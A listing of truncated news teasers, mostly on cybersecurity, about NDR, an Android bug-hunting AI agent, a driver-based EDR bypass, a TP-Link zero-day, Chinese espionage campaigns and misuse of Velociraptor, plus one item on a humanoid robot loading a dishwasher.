In the current cybersecurity landscape, threats are moving ever faster and more sophisticated. Traditional defense tools are no longer sufficient to ensure complete visibility, especially when the attack leaves no obvious traces on endpoints or exploits fileless techniques. In this context, the concept of Network Detection and Response (NDR) comes to the fore: a technology designed to detect anomalous behavior in network traffic and activate intelligent countermeasures. But what exactly is an NDR? How does it work? And why is it an increasingly crucial component of the corporate security strategy? What is Network Detection and Response Network Detection and Response is an

Artificial intelligence systems have been criticized for creating confusing vulnerability reports and inundating open-source developers with irrelevant complaints. But researchers at Nanjing University and the University of Sydney have an example to the contrary: they presented an agent called A2, capable of finding and verifying vulnerabilities in Android applications, mimicking the work of a bug hunter. The new development is a continuation of the previous A1 project, which was able to exploit bugs in smart contracts. The authors claim that A2 achieved 78.3% coverage on the Ghera test suite, outperforming the static analyzer APKHunt, which achieved only 30%. Run on 169 real

California-based company Figure has unveiled another milestone for its humanoid Figure 02: the robot loaded a dishwasher with high precision using the versatile Helix model, based on the Vision-Language-Action (VLA) architecture. A seemingly trivial task for humans turns into a complex test of precision, grip strength, and adaptation to different types of objects for the artificial assistant. What’s unique is that no new logic or special algorithms were created to perform this task. This success is based on the same universal Helix system, which has already demonstrated its capabilities in other scenarios. Thanks to additional data and learning from examples of human

Cybercriminals have launched a new wave of attacks using SVG files to distribute phishing pages. Experts at VirusTotal have reported that attackers are impersonating the Colombian prosecutor’s office, distributing email attachments containing hidden JavaScript code. Automatic analysis revealed behaviors that antivirus programs were unable to detect. The SWF format, formally “dead” since Flash was deactivated in 2020, continues to appear in traffic. In 30 days, VirusTotal received 47,812 previously unknown unique SWF files, and 466 of them triggered at least one antivirus engine. In one case, only three out of 63 triggers indicated “suspicious” signs of an old vulnerability, but detailed analysis

A recent study conducted by Workday’s Offensive Security team highlighted a vulnerability in Windows drivers that effectively bypasses Endpoint Detection and Response (EDR) tools. This technique exploits direct disk reading, bypassing access controls, file locks, and security measures such as Virtualization-Based Security (VBS) and Credential Guard. The identified vulnerable driver, eudskacs.sys, exposes simple code structures that allow direct reading of the physical disk, allowing access to sensitive files without directly interacting with them. Traditionally, Windows implements several defenses to protect sensitive data. For example, credential files such as SAM.hive and SYSTEM.hive are protected by Access Control Lists (ACLs) and exclusive locks that

A new zero-day vulnerability has been discovered affecting several TP-Link router models. The issue, identified as a buffer overflow in the CPE WAN Management Protocol (CWMP) implementation, could allow an attacker to execute arbitrary code and redirect DNS requests to rogue servers. The vulnerability was reported by an independent researcher known by the handle Mehrun (ByteRay) on May 11, 2024. TP-Link has confirmed the existence of the flaw and is working on updates to address the issue. Currently, the fix is only available for European firmware versions; the rollout for the US and other regions is ongoing. The vulnerability resides in the

A vast Chinese cyberespionage operation, dubbed “Salt Typhoon,” was recently described as the most ambitious ever attributed to Beijing. According to the report, this campaign resulted in the theft of sensitive data on nearly every American, including high-profile names like President Donald Trump and Vice President J.D. Vance. The scale of the attack confirms the ability of Chinese groups to penetrate deep into international communications networks. The targets hit are not limited to the United States: Salt Typhoon has compromised telecommunications networks in over 80 countries, demonstrating the global reach of this operation. The choice to target telecommunications appears strategic, as it

A cybercriminal group, dubbed GhostRedirector by ESET researchers and linked to the Chinese ecosystem, has quietly deployed a global search engine manipulation scheme based on hacked Windows hosts. According to telemetry and internet scans from June, at least 65 servers in several countries have been compromised. The first confirmed infections were recorded in December, but a series of related samples indicates activity since at least August 2024, so this is not an epidemic, but a long-term campaign with established roles and infrastructure. At its core are two specially written components. Rungan is a passive backdoor written in C++ that, once activated, accepts

Microsoft has announced that the August 2025 Windows security updates may cause unexpected User Account Control (UAC) prompts and issues when installing apps. The bug affects non-administrator users on all supported versions of Windows. The issue is caused by a patch that addresses a privilege escalation vulnerability in Windows Installer (CVE-2025-50173). This vulnerability allowed authenticated attackers to gain SYSTEM-level privileges. To address this issue, Microsoft has implemented new User Account Control prompts that require administrator credentials in various situations to prevent potential escalations of privilege by attackers. In some scenarios, these prompts may occur when running MSI repair commands (such as msiexec

Sophos security specialists have drawn attention to a cyberattack in which unknown attackers used the open-source forensic tool Velociraptor to monitor endpoints. “In this incident, attackers used a tool to download and run Visual Studio Code with the likely intent of creating a tunnel to a command-and-control server,” Sophos Counter Threat experts said. Unit. The report emphasizes that attackers often employ “living-off-the-land” (LotL) tactics and use legitimate remote monitoring and control tools in attacks, but the use of Velociraptor signals an evolution of such tactics, where incident response software is being misused for malicious purposes. Analysis of the incident showed that the